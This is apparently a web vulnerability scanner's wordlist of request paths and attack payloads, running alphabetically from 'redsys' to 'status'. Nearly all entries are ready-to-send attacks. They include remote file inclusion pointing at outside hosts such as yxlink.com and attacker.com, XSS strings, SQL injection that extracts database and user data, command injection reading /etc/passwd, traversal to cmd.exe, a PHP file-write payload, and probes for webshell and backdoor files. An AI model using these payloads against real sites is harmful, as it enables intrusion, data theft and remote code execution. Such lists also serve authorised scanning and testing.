redsys/404.php?REDSYS[MYPATH][TEMPLATES]=http://www.yxlink.com/nvs_test.txt
register.php
register.php?acuparam=>\x22><ScRiPt>alert(2222)</ScRiPt>
register.php?base_dir=http://www.yxlink.com/nvs_test.txt
register.php?myaction=getpasswd&username=\x22><script>alert(1);</script>
register.txt
registration.txt
release
releasenote.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt 
rempass.php?lang=http://www.yxlink.com/nvs_test.txt
replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
report
report.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
reports/Webalizer/
reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=save&Page=rep
reports/default.asp?sort=[ReportImpact_Name]&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter=save&Page=rep
reports/rwservlet/showenv?server=reptest&debug=<script>alert(222);</script>
reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22http://testasp.vulnweb.com/rpb.png%22
reports/temp/
reports/who_r.php?bj=http://www.yxlink.com/nvs_test.txt
res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
reseller
reset
resin-admin/digest.php?digest_attempt=1&digest_realm=\x22><script>alert(222)</script><a&digest_username[]=
resin-admin/digest.php?digest_attempt=1&digest_username=\x22><script>alert(111)</script><a
resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert(222)>
resourceNode/resources.jsf?');};alert(222);</script><!--
resources
resources/
resources/fckeditor
resources/includes/class.Smarty.php?cfg[sys][base_path]=http://www.yxlink.com/nvs_test.txt
respond.php?code=tenpay&attach=voucher&sp_billno=1%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5%28333%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%201=1
ressourcen/dbopen.php?home=http://attacker.com/http://www.yxlink.com/nvs_test.txt?
ressourcen/dbopen.php?home=http://www.yxlink.com/nvs_test.txt?
rest
restricted
restservice
revize/debug/query_results.jsp?webspace=REVIZE&query=select%20md5(333)%20from%20pbpublic.rSubjects
robots.txt
robotstats.inc.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
rolis_book_path/insert.inc.php?path=http://www.yxlink.com/nvs_test.txt
roller-ui/login.rol?pageTitle=${new%20java.lang.Integer(99899%2b99466)}
root
root.php
root/
root/public/code/cp_html2txt.php?page=http://www.yxlink.com/nvs_test.txt
rootnull.php
rootshell v2.0.php
routines/fieldValidation.php?jssShopFileSystem=http://www.yxlink.com/nvs_test.txt
rpc.php?q='&t='
rpc.php?q=\x5C\x22><script>alert(document.cookie)</script>
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rspa/framework/Controller_v4.php?__ClassPath=http://www.yxlink.com/nvs_test.txt
rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://www.yxlink.com/nvs_test.txt
rss
rss.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
rss.php?phpraid_dir=http://www.yxlink.com/nvs_test.txt
rss.php?premodDir=http://www.yxlink.com/nvs_test.txt
rss2.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
rst.php
rtm.log
run.php?dir=SHELL?&file=http://www.yxlink.com/nvs_test.txt
s
s.php
s01.php?shopid=http://www.yxlink.com/nvs_test.txt
s02.php?shopid=http://www.yxlink.com/nvs_test.txt?
s03.php?shopid=http://www.yxlink.com/nvs_test.txt?
s04.php?shopid=http://www.yxlink.com/nvs_test.txt?
sablonlar/gunaysoft/gunaysoft.php?icerikyolu=http://www.yxlink.com/nvs_test.txt
sablonlar/gunaysoft/gunaysoft.php?sayfaid=http://www.yxlink.com/nvs_test.txt
saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=http://www.yxlink.com/nvs_test.txt
safer.php
saiy060118.php
sales.csv
sales.log
sales.sql
sales.sql.gz
sales.txt
sales.xls
sample
samples
samples/search.dll?query=<script>alert(document.cookie)</script>
sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')>
sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role=aaaaaaaa<IMG/SRC=JaVaScRiPt:alert('DSECRG')>
sap/bc/gui/sap/its/webgui/aaaaaaa\x22><img/src=javascript:alert('DSECRG_XSS')>
save
save.php?file_save=http://www.yxlink.com/nvs_test.txt
saveserver.php?thisdir=http://www.yxlink.com/nvs_test.txt
sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
sca/menu.jsp
scanner.php
schema.sql
schema.yml
scozbook/view.php?PG=whatever
scrape.php?info_hash=%22union%20select%201,1,1,1,md5(333)%20from%20users--
script
script-that-dont-has-to-exist.jsp?foobar=\x22/><script>alert(111)</script>
script//ident/index.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/_conf/core/common-tpl-vars.php?confdir=http://www.yxlink.com/nvs_test.txt?
script/common.inc.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/gestion/index.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/disconnect.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/ident.inc.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/identification.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/loginliste.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/ident/loginmodif.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/index.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/init/createallimagecache.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
script/menu/menuadministration.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/menu/menuprincipal.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/param/param.inc.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/plugins/phpgacl/admin/index.php?path_inc=http://www.yxlink.com/nvs_test.txt
script/template/index.php?main_page_directory=http://www.yxlink.com/nvs_test.txt
script/tick/allincludefortick.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
script/tick/test.php?PATH_TO_CODE=http://www.yxlink.com/nvs_test.txt
script>alert('Vulnerable')</script>.cfm
script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
script_path/cms/classes/openengine/filepool.php?oe_classpath=http://www.yxlink.com/nvs_test.txt?
script_path/installation/index.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=http://www.yxlink.com/nvs_test.txt
scripts
scripts/
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
scripts/check-lom.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
scripts/gallery.scr.php?GLOBALS[PTH][func]=http://www.yxlink.com/nvs_test.txt?
scripts/history/historyFrame.html
scripts/iisadmin/ism.dll?http/dir
scripts/jwplayer/player.swf?playerready=alert(document.domain)&debug=function(){alert(document.domain)}
scripts/lom_update.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
scripts/news.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
scripts/no-such-file.pl
scripts/polls.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
scripts/repost.asp
scripts/root.exe?/c+dir+c:\x5C+/OG
scripts/rss.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
scripts/search.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt?
scripts/sitemap.scr.php?GLOBALS[PTH][classes]=http://www.yxlink.com/nvs_test.txt
scripts/tiny_mce
scripts/tinymce
scripts/weigh_keywords.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=http://www.yxlink.com/nvs_test.txt?
scripts/yui/uploader/assets/uploader.swf?allowedDomain=\x22})))}catch(e){alert(document.domain);}//
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
search
search.asp?Search=
search.asp?Search=\x5C\x22>&lt;script&gt;alert(Vulnerable)&lt;/script&gt;
search.asp?term=<%00script>alert('Vulnerable')</script>
search.php/>\x22><ScRiPt>alert(1111)</ScRiPt>
search.php?SearchFor=<script>alert(/farbodmahini/)</script>
search.php?action='
search.php?asc=desc\x22><script>alert(111);</script>
search.php?asc=desc\x22><script>alert(111)</script>
search.php?c=5&hit=1&s='/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
search.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
search.php?custom[%27)%20AND%20(SELECT%208734%20FROM(SELECT%20COUNT(*),CONCAT(md5(333),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23]=1
search.php?id=http://www.yxlink.com/nvs_test.txt
search.php?insPath=http://www.yxlink.com/nvs_test.txt
search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
search.php?query=facked';?><?fputs(fopen('nvs_test.php','w'),base64_decode('VGVzdCBmb3IgbnZzX2tpbmdjbXM='));?>&modelid=1%20or%202=2
search.php?query=xsss%20%3Cscript%3Ealert('HELLO');%3C/script%3E&search=1
search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
search.php?searchfor=\x5C\x22><script>alert('Vulnerable');</script>
search.php?searchstring=<script>alert(document.cookie)</script>
search.php?searchword=<script>alert(1333)</script>
search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
search.php?zoom_query=<script>alert(\x5C\x22hello\x5C\x22)</script>
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
search/
search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
search/?q=zhuba&type=all\x22><iframe src=HTTP://www.baidu.com>&page=1&order=
search/?term=%3Cbody%20onload=alert(document.cookie)%3E
search/SQLQHit.asp
search/htx/SQLQHit.asp
search/htx/sqlqhit.asp
search/inc/
search/index.cfm?<script>alert(\x5C\x22Vulnerable\x5C\x22)</script>
search/index.php?imageField.x=-1138&imageField.y=-319&key=1%27)and%20(select%201%20from%20(select%20count(*),concat(md5(333),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
search/query/search?search.timezone=&search_p_groups=\x22'><IMG%20SRC=javascript:alert(document.cookie)>&q=1234&btnSearch=Search
search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
search/sqlqhit.asp
search/submit.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
search_wA.php?LIBPATH=http://www.yxlink.com/nvs_test.txt
searchbot.php?path=http://www.yxlink.com/nvs_test.txt
searchenginepath/site_searcher.cgi?page=|id|
secret
secrets
secure
secure/
secured
secured/
security
security/include/_class.security.php?PHPSECURITYADMIN_PATH=http://www.yxlink.com/nvs_test.txt
seeyon/main.do?method=officeDown&filename=c:/boot.ini
seeyon/management/status.jsp
sendmessage.php/>\x22><ScRiPt>alert(213771818860)</ScRiPt>
sendpage.pl?message=test\x5C;/bin/ls%20/etc;echo%20\x5Cmessage
sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://www.yxlink.com/nvs_test.txt?
sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=http://www.yxlink.com/nvs_test.txt?
senetman/html/index.php?page=http://www.yxlink.com/nvs_test.txt
server-info
server-status
server.js
server.log
server_stats/
service
service.asmx
services
services.php?page=http://www.yxlink.com/nvs_test.txt
services/
services/samples/inclusionService.php?CabronServiceFolder=http://www.yxlink.com/nvs_test.txt%00
servlet
servlet/%0ARefresh:0;URL=javascript:prompt(1)%0A1
servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
servlet/IsItWorking
servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
servlet/SnoopServlet
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&
servlet/com.newatlanta.servletexec.JSP10Servlet/
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../WEB-INF/web.xml
servlet/com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
servlet/webacc?User.html=noexist
servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
session
sessions
setpasswd.cgi
settings
settings.php
settings.php?P[includes]=http://www.yxlink.com/nvs_test.txt
settings/site.ini
settings_sql.php?path=http://www.yxlink.com/nvs_test.txt
setup
setup.cgi?user_list=1&sysname=admin&sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http_wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=\x22><script>history.back()</script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message=http://tinyurl.com/36sjzw
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
setup/header.php?css_path=http://www.yxlink.com/nvs_test.txt
setup/inc/database.php?tcms_administer_site=http://www.yxlink.com/nvs_test.txt
setup/upgrader.php?RootDirectory=http://www.yxlink.com/nvs_test.txt
sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
sezhoo/SezHooTabsAndActions.php?IP=http://www.yxlink.com/nvs_test.txt
sftp-config.json
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
sh0w.php
share
share.php?F_email=1%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
she11.php
shell
shell.php
shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
shop.pl/page=;cat%20shop.pl|
shop/includes/header.inc.php?dateiPfad=http://www.yxlink.com/nvs_test.txt
shop/index.php?action=http://www.yxlink.com/nvs_test.txt?&cmd=cat%20config.php
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
shop/normal_html.cgi?file=&lt;script&gt;alert(\x5C\x22Vulnerable\x5C\x22)&lt;/script&gt;
shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/page.php?osCsid=http://www.yxlink.com/nvs_test.txt?
shop/page.php?pageid=http://www.yxlink.com/nvs_test.txt?
shopadmin.asp?Password=abc&UserName=\x5C\x22><script>alert(foo)</script>
shopadmin/index.php?ctl=passport&act=login&sess_id=1'and/**/(select/**/1/**/from/**/(select/**/count(*),concat(md5(3333),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
shopdbtest.asp
shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>
shopexd.asp?catalogid='42
shopgiftregsearch.asp?LoginLastname='%20union%20select%200,8888-1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
shoppingcart.php?a=addshopingcart&goodsid=1%20and%20@`'`%20/*!50000union*/%20select%20null,null,null,null,null,null,null,null,null,null,md5(333),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mysql.user%20where%201=1%20or%20@`'`&buynum=1&goodsattr=tpcs
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
shoutbox.php?language=http://www.yxlink.com/nvs_test.txt
shoutbox.php?root=http://www.yxlink.com/nvs_test.txt?cmd=id
show.php?file=http://www.yxlink.com/nvs_test.txt
show.php?id=http://www.yxlink.com/nvs_test.txt
show.php?page=http://www.yxlink.com/nvs_test.txt
show.php?path=http://www.yxlink.com/nvs_test.txt
show/index.php?prefix=http://www.yxlink.com/nvs_test.txt
show_archives.php?cutepath=http://www.yxlink.com/nvs_test.txt?
showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
showcheckins.cgi?person=<script>alert('Vulnerable')</script>
showmail.pl?Folder=<script>alert(document.cookie)</script>
showthread.php?acuparam=>\x22><ScRiPt>alert(213771818860)</ScRiPt>
showtopiclist.aspx?direct=\x22><script>alert(123)</script>&search=1
showuser.aspx?orderby=atestu&ordertype=%22</script><script>alert(123)</script>&page=1
showuser.cgi
sign_in/
signer/final.php?smiley=http://www.yxlink.com/nvs_test.txt?
signin.php?sent=1&AMG_serverpath=http://www.yxlink.com/nvs_test.txt
signon
signup
simple-backdoor.php
simple/view_page?mv_arg=|cat%20/etc/passwd|
simpleviewer/web/svcore/swf/simpleviewer.swf?xmlDataPath=http://attacker.website/simpleviewer/payload.xml
sinagb.php?fuss=http://www.yxlink.com/nvs_test.txt
sinapis.php?fuss=http://www.yxlink.com/nvs_test.txt
site
site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html
site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html
site/includes/amchart/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
site_admin
siteadmin
sitebar/Integrator.php?file=http://www.yxlink.com/nvs_test.txt
sitebar/index.php?writerFile=http://www.yxlink.com/nvs_test.txt
sitebuilder/admin/top.php?admindir=http://www.yxlink.com/nvs_test.txt
sitemap.xml
sitemap.xml.gz
sitemap.xml.php?dir[classes]=http://www.yxlink.com/nvs_test.txt
siteminder/smadmin.html
sites/all/libraries/fckeditor
sites/all/modules/civicrm/packages/OpenFlashChart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
sites/all/modules/fckeditor
sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
sites/default/settings.php
siteserver/UserRole/background_userAdd.aspx?UserName=yjfjnpuc'%20and%201=str(123.4,8,4)%20and%201='1&ReturnUrl=../cms/console_user.aspx
siteserver/bbs/background_post.aspx?UserName=&Title=%27%20and%20%201=str(123.4,8,4)%20and%201=%271&DateFrom=&DateTo=&ForumID=0
siteserver/bbs/background_thread.aspx?UserName=test&Title=%27%20and%201=str(123.4,8,4)%20and%201=%27&DateFrom=&DateTo=&ForumID=0
siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=a'%20and%201=str(123.4,8,4)%20and%201='1
siteserver/cms/background_contentsGroup.aspx?publishmentSystemID=1&contentGroupName=test'%20and%201=str(123.4,8,4)%20and%201='1
siteserver/cms/background_fileTree.aspx?PublishmentSystemID=0&RootPath=&CurrentRootPath=include
siteserver/cms/background_mailSubscribe.aspx?PublishmentSystemID=0&Keyword='%20and%201=str(123.4,8,4)%20and%201='1&DateFrom=&DateTo=
siteserver/cms/background_nodeGroup.aspx?PublishmentSystemID=0&SetTaxis=True&GroupName=test4'%20and%201=str(123.4,8,4)%20and%201='1&Direction=DOWN
siteserver/cms/console_user.aspx?PageNum=0&Keyword=1%27%20and%201=str(123.4,8,4)%20and%201=%271&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0
siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%201=str(123.4,8,4)%20and%201='1
siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1'%20and%201=str(123.4,8,4)%20and%201='1
siteserver/service/background_taskLog.aspx?Keyword=test%%27%20and%20str(123.4,8,4)=1%20and%202=%271&DateFrom=&DateTo=&IsSuccess=All
siteserver/userRole/background_administrator.aspx?RoleName=%27%20and%20str(123.4,8,4)=1%20and%201=%271&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName
siteserver/userRole/background_administrator.aspx?RoleName='%20and%20str(123.4,8,4)=1%20and%201='1&PageNum=0&Keyword=test&AreaID=0&LastActivityDate=0&Order=UserName
siteserver/userRole/background_user.aspx?PageNum=0&Keyword=%27%20and%20str(123.4,8,4)=1%20and%201=%27&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0
skin/board/default/doctype.php?dir=http://www.yxlink.com/nvs_test.txt
skin/dark/template.php?path=http://www.yxlink.com/nvs_test.txt
skin/gold/template.php?path=http://www.yxlink.com/nvs_test.txt
skin/html/table.php?pachtofile=http://www.yxlink.com/nvs_test.txt
skin/original/template.php?path=http://www.yxlink.com/nvs_test.txt
skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yxlink.com/nvs_test.txt
skins/advanced/advanced1.php?pluginpath[0]=http://www.yxlink.com/nvs_test.txt
skins/default.php?dir_inc=http://www.yxlink.com/nvs_test.txt
skins/header.php?ote_home=http://www.yxlink.com/nvs_test.txt
skins/phpchess/layout_admin_cfg.php?Root_Path=http://www.yxlink.com/nvs_test.txt
skins/phpchess/layout_cfg.php?Root_Path=http://www.yxlink.com/nvs_test.txt
skins/phpchess/layout_t_top.php?Root_Path=http://www.yxlink.com/nvs_test.txt
skysilver/login.tpl.php?theme=http://www.yxlink.com/nvs_test.txt?
slogin_lib.inc.php?slogin_path=http://www.yxlink.com/nvs_test.txt
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smarty
smarty.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
smarty/smarty_class.php?_smarty_compile_path=http://www.yxlink.com/nvs_test.txt
smilies.php?config=http://www.yxlink.com/nvs_test.txt
sms_config/gateway.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt
snapshot
snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(md5(333),char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.yxlink.com/nvs_test.txt
snoop.jsp
snort/base_stat_common.php?BASE_path=http://www.yxlink.com/nvs_test.txt
soap
soap.aspx
soap.jsp
soap.php
soapdocs/ReleaseNotes.html
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
social2/user.php?userId=12'
social_game_play.php?path=http://www.yxlink.com/nvs_test.txt?
software/
software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=http://www.yxlink.com/nvs_test.txt
soinfo.php?\x5C\x22><script>alert('Vulnerable')</script>
solr
solr/admin/
solr/select/?q=test
somefile.png?\x22><script>alert('xss')</script>
song.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
sort.php?skinco=black\x22><script>alert(111)</script>
sort.php?skinco=black\x22><script>alert(1111);</script>
source.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
source/
source/mod/rss/channeledit.php?Codebase=http://www.yxlink.com/nvs_test.txt
source/mod/rss/post.php?Codebase=http://www.yxlink.com/nvs_test.txt
source/mod/rss/view.php?Codebase=http://www.yxlink.com/nvs_test.txt
source/mod/rss/viewitem.php?Codebase=http://www.yxlink.com/nvs_test.txt
source/plugin/doconline/doconline.php?doc=/config/config_global_default.php
sources/Admin/admin_cats.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/Admin/admin_edit.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/Admin/admin_import.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/Admin/admin_templates.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/functions.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/help.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.yxlink.com/nvs_test.txt
sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.yxlink.com/nvs_test.txt?cmd=ls
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.yxlink.com/nvs_test.txt
sources/mail.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/misc/new_day.php?path=http://www.yxlink.com/nvs_test.txt
sources/news.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/post.php?fil_config=http://www.yxlink.com/nvs_test.txt
sources/template.php?CONFIG[main_path]=http://www.yxlink.com/nvs_test.txt
sources/tourney/index.php?page=http://www.yxlink.com/nvs_test.txt?
space
space.php?suid=1%d5%27%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5(333),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
spaw/spaw_control.class.php?GLOBALS[spaw_root]=http://www.yxlink.com/nvs_test.txt
spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt
speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/speedberg.class.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=http://www.yxlink.com/nvs_test.txt
spellcheckwindowframeset.php?SpellIncPath=http://www.yxlink.com/nvs_test.txt
spool
spyweb.php
sql
sql.inc
sql/
sqladm
sqlbuddy
sqlnet.log
sqlqhit.asp
squirrelcart/cart_content.php?cart_isp_root=http://www.yxlink.com/nvs_test.txt
src
src/
src/ark_inc.php?cfg_pear_path=http://www.yxlink.com/nvs_test.txt?
src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.yxlink.com/nvs_test.txt
src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
src/scripture.php?pageHeaderFile=http://www.yxlink.com/nvs_test.txt?
ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
ssdefs/siteseed.dtd
ssi.php?a=out&type=xml&f=0)'
ssi/
staff
starnet/themes/c-sky/main.inc.php?cmsdir=http://www.yxlink.com/nvs_test.txt?
start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
start.php?config=alper.inc.php
start.php?lang=http://www.yxlink.com/nvs_test.txt
start.php?pg=http://www.yxlink.com/nvs_test.txt
stat/
stat_modules/users_age/module.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
static
static/
staticfiles/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
statistics
statistics/
stats
stats.php?vwar_root=http://www.yxlink.com/nvs_test.txt
stats.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
stats/
stats/statsbrowse.asp?filepath=c:\x5C&Opt=3
status
status?full=true
